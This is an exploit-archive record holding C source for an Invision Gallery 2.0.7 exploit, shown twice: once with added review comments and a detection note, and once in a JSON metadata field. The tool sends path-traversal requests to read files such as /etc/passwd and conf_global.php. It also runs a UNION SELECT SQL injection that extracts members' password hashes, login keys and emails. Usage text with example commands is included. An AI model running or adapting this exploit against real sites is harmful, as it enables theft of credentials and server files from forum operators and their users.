ID EXPLOITPACK:631E9E94210D781DF25EBD39B674E4D5
Type exploitpack
Reporter 1nf3ct0r
Modified 2006-10-03T00:00:00
Description
Invision Gallery 2.0.7 - readfile() SQL Injection
/*
_ _ _ _ _ __ _ _ _
| || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
| __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
|_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
hellknights.void.ru |___/
(c)oded by _1nf3ct0r_
Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit
+-------------+
| Uzage: |
+-------------+
[+] ReadFile():
- syntax:
readfile 1 <host> <pathtoindex> <localfile>
readfile 2 <host> <pathtoindex> <localfile> // try it if readfile[1] failed ;)
- params:
<localfile> - path to local file (../file), for example: ../../../../../etc/passwd
s0, if u want to get local path to IPB try this: ../../hellknightscrewxploit :)
- examples:
readfile 1 asd.ru index.php ../../../../../../etc/passwd
readfile 1 asd.ru forum/index.php ../../conf_global.php
readfile 1 asd.ru forum/index.php ../../conf_global.php%00
[+] SQL-injection:
- syntax
sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>
getprefix <host> <pathtoindex> // get database prefix from IPB error :)
- params:
<member_id> - member's id for SQL-injection result, for example: 1
<column> - ipb members' column to get. for example: ip_adress, email.
<table> - ipb table to use. for example: member
<prefix> - database prefix.
- examples:
ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1
ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1
ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5
[~] sorry, but i`m too lazy 2 optimize this c0de...
[~] Music: Orbital - Halcyon and On and On (OST Hackers) :)
[~] compiled with LCC without any warnings
Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team
itz public c0de n0w, have phun :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
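/*
 * Resolve `host` (a DNS name or a dotted-quad literal) to an IPv4 address
 * in network byte order.
 *
 * Returns 0 when the name neither resolves nor parses as a literal. 0 is
 * also returned for an address record that is not an AF_INET record of
 * exactly sizeof(DWORD) bytes, so callers must treat 0 as "unresolved";
 * Exploit() below does not check it.
 *
 * Why the record check: h_length used to be copied into the 4-byte local
 * unconditionally, so any record larger than that would have overrun the
 * stack. Only a record that fits exactly is accepted now.
 */
DWORD resolve(char *host)
{
    DWORD ret = 0;
    struct hostent * hp = gethostbyname(host);
    if (hp != NULL) {
        /* Accept only an AF_INET record that fits ret exactly. */
        if (hp->h_addrtype != AF_INET || hp->h_addr == NULL ||
            hp->h_length != (int)sizeof ret) {
            return 0;
        }
        memcpy((void*)&ret, hp->h_addr, sizeof ret);
        return ret;
    }
    /* Not a resolvable name: fall back to a dotted-quad literal. */
    ret = inet_addr(host);
    if (ret == INADDR_NONE) return 0;
    return ret;
}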
// Send one pre-built HTTP/1.0 request to `host` on port 80, read the whole
// response one byte at a time, and print the part after the header
// terminator ("\r\n\r\n").
//   sendbuffer - complete request text, NUL-terminated (built by main()).
//   mode       - "readfile": print the response body verbatim;
//                "sqlinject": print one '&'-delimited field of the body
//                (see the strtok() chain below); anything else prints an
//                error message.
//   host       - name or dotted-quad handed to resolve().
// Returns -1 when connect() fails, 0 otherwise (parse failures are not
// reported to the caller).
// Review notes (code left as written):
//  * the socket from socket() and the 0 that resolve() returns for an
//    unresolvable host are both used unchecked, and the socket is never
//    closed on any path;
//  * the receive loop appends at strlen(recvbuffer) with no check against
//    the 10024-byte buffer, so a response of 10024 bytes or more overruns
//    the stack buffer with server-controlled data — a memory-safety bug in
//    the tool itself that the probed server can trigger; a NUL byte in the
//    response stops growth (strlen), and a recv() error (-1) is non-zero,
//    so the loop does not terminate on error;
//  * `temp` is assigned only when "\r\n\r\n" is found; otherwise it is read
//    uninitialised by the printf()/strtok() below (UB).
int Exploit(char * sendbuffer, char * mode, char * host)
{
char recvbuffer[10024]; char * temp;   // temp: start of the response body once found
memset(recvbuffer,0,10024);
SOCKET s = socket(AF_INET,SOCK_STREAM,0);   // return value not checked
SOCKADDR_IN webaddr;
webaddr.sin_addr.S_un.S_addr = resolve(host);   // 0 (unresolved) not checked
webaddr.sin_family = AF_INET;
webaddr.sin_port = htons(80);   // plain HTTP on a fixed port
if(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1;   // s is leaked here
send(s, sendbuffer, strlen(sendbuffer),0);   // short send / error ignored
int i, j;   // this j is unused; the loops below declare their own i and j
// One byte per recv(); the inner scan restarts from the start of the buffer
// after every byte (quadratic in the response length).
while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0))
for(int i = 0; recvbuffer[i]!=0; ++i)
{
if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&&
(recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n'))
{temp = (char*)&recvbuffer[i] + 4;break;}   // break leaves the for only, not the while
}
if(strcmp(mode,"readfile")==0)
{
printf("\n [+] Exploit Result:\n\n%s", temp);   // body printed unfiltered to the terminal
return 0;
}
if(strcmp(mode,"sqlinject")==0)
{
char * token = NULL; char * injected = NULL; char * parse = NULL;   // parse is unused
// Skip two '='-delimited and two '&'-delimited fields of the body, then
// print the second of the next two '&' fields. Any strtok() call here may
// return NULL, and a NULL `injected` reaches printf("%s") (UB). strtok()
// also writes NULs into recvbuffer as it goes.
token = strtok(temp, "=");
token = strtok(NULL, "=");
token = strtok(NULL, "&");
token = strtok(NULL, "&");
for(int j = 0; j < 2; j++)
{
token = strtok(NULL, "&");
if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); }
}
} else { printf("\n[-] some error. change MODE param\n"); return 0; }
return 0;
}
// Entry point. argv[1] selects the mode; the remaining positional arguments
// are read as follows (this is what the code does; the "sqlinject" syntax
// line in the help text lists them in a different order, the examples match
// the code):
//   readfile  <1|2> <host> <pathtoindex> <localfile>                argv[2..5]
//   sqlinject <host> <pathtoindex> <column> <prefix> <table> <id>  argv[2..7]
//   getprefix <host> <pathtoindex>                                 argv[2..3]
// Returns 1 after printing usage (argc == 1), 0 otherwise — including when
// the mode string matches nothing.
// Review notes (code left as written):
//  * only argc == 1 is guarded; any missing positional argument is a NULL
//    argv[k] handed to strcmp()/strcat() (crash, UB);
//  * every request is assembled with strcpy()/strcat() into a 1024-byte
//    stack buffer with no length check, so long arguments overflow it;
//  * the WSAStartup() and Exploit() return values are ignored, so a failed
//    connect is silent, and WSACleanup() is skipped on the usage path.
// Detection note: the requests built here carry "../" in the `dir=` query
// parameter and "union select" in `album=`; access-log review and WAF/IDS
// rules for Invision Gallery should key on exactly those shapes.
int main(int argc,char * argv[])
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);   // return value not checked
printf("\n ...............................................................\n");
printf(" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \n");
printf(" (c)oded by _1nf3ct0r_ // Hell Knights Crew \n");
printf(" http://hellknights.void.ru/ \n");
printf(" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \n");
printf(" ............................................................... \n");
// Usage text. Note this is the only argc check in the program.
if (argc == 1) {
printf("\n\n [+] ReadFile():\n");
printf(" - syntax:\n");
printf(" readfile 1 <host> <pathtoindex> <localfile> \n");
printf(" readfile 2 <host> <pathtoindex> <localfile> -- try it 1f readfile[1] failed \n");
printf(" - params: \n");
printf(" <localfile> - path to local file (../file), f0r example: ../../../../../etc/passwd\n");
printf(" s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit \n");
printf(" - examples:\n");
printf(" readfile 1 asd.ru index.php ../../../../../../etc/passwd\n");
printf(" readfile 1 asd.ru forum/index.php ../../conf_global.php\n");
// "%00" followed by '\n' is not a valid printf conversion (two '0' flags, no
// specifier): UB. A literal "%00" would need "%%00".
printf(" readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n\n\n");
printf(" [+] SQL-injection:\n");
printf(" - syntax\n");
// Order shown here does not match how argv is read in the sqlinject branch
// below (column=argv[4], prefix=argv[5], table=argv[6], id=argv[7]).
printf(" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n");
printf(" getprefix <host> <pathtoindex> -- get database prefix from IPB error \n");
printf(" - params:\n");
printf(" <member_id> - member's id for SQL-injection result, for example: 1\n");
printf(" <column> - ipb members' column to get. for example: ip_adress, email.\n");
printf(" <table> - ipb table to use. f0r example: member\n");
printf(" <prefix> - database prefix. \n");
printf(" - examples:\n");
printf(" ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \n");
printf(" ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\n");
printf(" ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n");
return 1;   // WSACleanup() is not reached on this path
}
char * mode = argv[1];
// --- readfile() exploit --- //
if (strcmp(mode,"readfile")==0)
{
// argv[2..5] are read without an argc check.
char * type = argv[2];
char * path = NULL; path = argv[4];   // the NULL initialiser is immediately overwritten
char * localfile = argv[5];
char * host = argv[3];
if (strcmp(type,"1")==0)
{
// Unbounded strcpy/strcat into a 1024-byte stack buffer; no length check
// on path, localfile or host.
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");
strcat(exploit, localfile);
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);   // -1 on connect failure is ignored
}
else if (strcmp(type,"2")==0)
{
// Same construction as type 1 with a different query string; same
// missing length check.
char exploit[1024];
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir=");
strcat(exploit, localfile);
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "readfile", host);   // return value ignored
}
// --- sql-injection exploit --- //
}
if(strcmp(mode,"sqlinject")==0)
{
// argv[2..7] are read without an argc check; note column comes before
// prefix, unlike the help text's syntax line.
char * host = argv[2];
char * path = argv[3];
char * prefix = argv[5];
char * column = argv[4];
char * table = argv[6];
char * id = argv[7];
char exploit[1024];   // same unbounded strcat construction as above
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
strcat(exploit, column);
strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
strcat(exploit, prefix);
strcat(exploit, table);
strcat(exploit, "%20WHERE%20id=");
strcat(exploit, id);
strcat(exploit, "/*31337*/");
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
Exploit(exploit, "sqlinject", host);   // return value ignored
}
if (strcmp(mode,"getprefix")==0)
{
// argv[2..3] are read without an argc check. The response is printed in
// "readfile" mode, i.e. the raw body, which is expected to be an error page.
char * path = argv[3];
char * host = argv[2];
char exploit[1024];   // same unbounded strcat construction as above
strcpy(exploit, "GET /");
strcat(exploit, path);
strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");
strcat(exploit, " HTTP/1.0\r\nHost: ");
strcat(exploit, host);
strcat(exploit, "\r\n\r\n");
printf("\n\n\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\n\n");
Exploit(exploit, "readfile", host);   // return value ignored
}
WSACleanup();
return 0;   // also reached when mode matched none of the three branches
}
// milw0rm.com [2006-10-03]
{"lastseen": "2020-04-01T19:04:21", "references": [], "description": "\nInvision Gallery 2.0.7 - readfile() SQL Injection", "edition": 1, "reporter": "1nf3ct0r", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-10-03T00:00:00", "title": "Invision Gallery 2.0.7 - readfile() SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:21", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:04:21", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-10-03T00:00:00", "id": "EXPLOITPACK:631E9E94210D781DF25EBD39B674E4D5", "href": "", "viewCount": 1, "sourceData": "/*\n _ _ _ _ _ __ _ _ _\n | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___\n | __ / -_) | | ' <| ' \\| / _` | ' \\ _(_-<\n |_||_\\___|_|_|_|\\_\\_||_|_\\__, |_||_\\__/__/\n hellknights.void.ru |___/ \n (c)oded by _1nf3ct0r_\n\n Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit\n \n+-------------+\n| Uzage: |\n+-------------+\n[+] ReadFile():\n - syntax:\n readfile 1 <host> <pathtoindex> <localfile> \n readfile 2 <host> <pathtoindex> <localfile> // try it if readfile[1] failed ;)\n - params: \n <localfile> - path to local file (../file), for example: ../../../../../etc/passwd\n s0, if u want to get local path to IPB try this: ../../hellknightscrewxploit :) \n - examples:\n readfile 1 asd.ru index.php ../../../../../../etc/passwd\n readfile 1 asd.ru forum/index.php ../../conf_global.php\n readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n \n[+] SQL-injection:\n - syntax\n sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n getprefix <host> <pathtoindex> // get database prefix from IPB error :) \n - params:\n <member_id> - member's id for SQL-injection result, for example: 1\n <column> - ipb members' column to get. for example: ip_adress, email.\n <table> - ipb table to use. for example: member\n <prefix> - database prefix. 
\n - examples:\n ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \n ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\n ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n \n[~] sorry, but i`m too lazy 2 optimize this c0de... \n[~] Music: Orbital - Halcyon and On and On (OST Hackers) :) \n[~] compiled with LCC without any warnings\n\nGr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \n itz public c0de n0w, have phun :> \n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <winsock2.h>\n\nDWORD resolve(char *host)\n{\n DWORD ret = 0;\n struct hostent * hp = gethostbyname(host);\n if (!hp) ret = inet_addr(host);\n if ((!hp)&&(ret == INADDR_NONE)) return 0;\n if (hp != NULL) memcpy((void*)&ret, hp->h_addr,hp->h_length);\n return ret;\n}\n\nint Exploit(char * sendbuffer, char * mode, char * host)\n{\n\tchar recvbuffer[10024]; char * temp; \n\tmemset(recvbuffer,0,10024);\n\n\tSOCKET s = socket(AF_INET,SOCK_STREAM,0);\n\tSOCKADDR_IN webaddr;\n\t\twebaddr.sin_addr.S_un.S_addr = resolve(host);\n\t\twebaddr.sin_family = AF_INET;\n\t\twebaddr.sin_port = htons(80);\n\tif(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1;\n\tsend(s, sendbuffer, strlen(sendbuffer),0);\n\t\n\tint i, j;\n\twhile(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) \n\tfor(int i = 0; recvbuffer[i]!=0; ++i)\n\t{\n\t\tif((recvbuffer[i]=='\\r')&&(recvbuffer[i+1]=='\\n')&&\n\t\t\t(recvbuffer[i+2]=='\\r')&&(recvbuffer[i+3]=='\\n'))\n\t\t{temp = (char*)&recvbuffer[i] + 4;break;}\n\t}\n\t\n\t\n\tif(strcmp(mode,\"readfile\")==0)\n\t{\n\tprintf(\"\\n [+] Exploit Result:\\n\\n%s\", temp);\n\treturn 0;\n\t}\n\t\n\tif(strcmp(mode,\"sqlinject\")==0)\n\t{\t\t\n\tchar * token = NULL; char * injected = NULL; char * parse = NULL;\n token = strtok(temp, \"=\"); \n\ttoken = strtok(NULL, \"=\");\n\ttoken = strtok(NULL, \"&\");\n\ttoken = strtok(NULL, \"&\");\n\tfor(int j = 0; j < 2; j++)\n\t\t{\n \ttoken = strtok(NULL, 
\"&\");\n\t if(j==1){ injected = token; printf(\"\\n [+] Exploit Result:\\n\\n%s\", injected); }\n\t\t}\n\n\t} else { printf(\"\\n[-] some error. change MODE param\\n\"); return 0; } \n\treturn 0;\n}\n\nint main(int argc,char * argv[])\n{\nWSADATA wsaData;\nWSAStartup(MAKEWORD(2,2),&wsaData);\n\n\t\tprintf(\"\\n ...............................................................\\n\");\n printf(\" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \\n\");\n printf(\" (c)oded by _1nf3ct0r_ // Hell Knights Crew \\n\");\n\t\tprintf(\" http://hellknights.void.ru/ \\n\");\n\t\tprintf(\" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \\n\");\n\t\tprintf(\" ............................................................... \\n\");\n\t\t\n\tif (argc == 1) {\n\nprintf(\"\\n\\n [+] ReadFile():\\n\");\nprintf(\" - syntax:\\n\");\nprintf(\" readfile 1 <host> <pathtoindex> <localfile> \\n\");\nprintf(\" readfile 2 <host> <pathtoindex> <localfile> -- try it 1f readfile[1] failed \\n\");\nprintf(\" - params: \\n\");\nprintf(\" <localfile> - path to local file (../file), f0r example: ../../../../../etc/passwd\\n\");\nprintf(\" s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit \\n\");\nprintf(\" - examples:\\n\");\nprintf(\" readfile 1 asd.ru index.php ../../../../../../etc/passwd\\n\");\nprintf(\" readfile 1 asd.ru forum/index.php ../../conf_global.php\\n\");\nprintf(\" readfile 1 asd.ru forum/index.php ../../conf_global.php%00\\n\\n\\n\");\nprintf(\" [+] SQL-injection:\\n\");\nprintf(\" - syntax\\n\");\nprintf(\" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\\n\");\nprintf(\" getprefix <host> <pathtoindex> -- get database prefix from IPB error \\n\");\nprintf(\" - params:\\n\");\nprintf(\" <member_id> - member's id for SQL-injection result, for example: 1\\n\");\nprintf(\" <column> - ipb members' column to get. for example: ip_adress, email.\\n\");\nprintf(\" <table> - ipb table to use. 
f0r example: member\\n\");\nprintf(\" <prefix> - database prefix. \\n\");\nprintf(\" - examples:\\n\");\nprintf(\" ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \\n\");\nprintf(\" ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\\n\");\nprintf(\" ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\\n\\n\");\n\t\t return 1;\n\t }\n\t\nchar * mode = argv[1];\n\n\n// --- readfile() exploit --- //\nif (strcmp(mode,\"readfile\")==0)\n{ \nchar * type = argv[2];\nchar * path = NULL; path = argv[4];\nchar * localfile = argv[5];\nchar * host = argv[3]; \n\tif (strcmp(type,\"1\")==0)\n\t{\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=\");\n\tstrcat(exploit, localfile);\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nExploit(exploit, \"readfile\", host);\n\n\t} \n\telse if (strcmp(type,\"2\")==0)\n\t{\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?act=gallery&code=viewimage&img=index.gif&dir=\");\n\tstrcat(exploit, localfile);\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nExploit(exploit, \"readfile\", host);\n\t}\n\n// --- sql-injection exploit --- //\n} \nif(strcmp(mode,\"sqlinject\")==0)\n{\nchar * host = argv[2]; \nchar * path = argv[3];\nchar * prefix = argv[5];\nchar * column = argv[4];\nchar * table = argv[6];\nchar * id = argv[7];\n\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,\");\n\tstrcat(exploit, column);\n\tstrcat(exploit, \",1,1,1,1,1,1,1,1%20FROM%20\");\n\tstrcat(exploit, prefix);\n\tstrcat(exploit, table);\n\tstrcat(exploit, \"%20WHERE%20id=\");\n\tstrcat(exploit, 
id);\n\tstrcat(exploit, \"/*31337*/\");\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \n Exploit(exploit, \"sqlinject\", host);\n} \nif (strcmp(mode,\"getprefix\")==0)\n{ \nchar * path = argv[3];\nchar * host = argv[2]; \n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew\");\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nprintf(\"\\n\\n\\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\\n\\n\");\nExploit(exploit, \"readfile\", host);\n}\n\nWSACleanup();\n\treturn 0;\n}\n\n// milw0rm.com [2006-10-03]", "cvss": {"score": 0.0, "vector": "NONE"}}
{}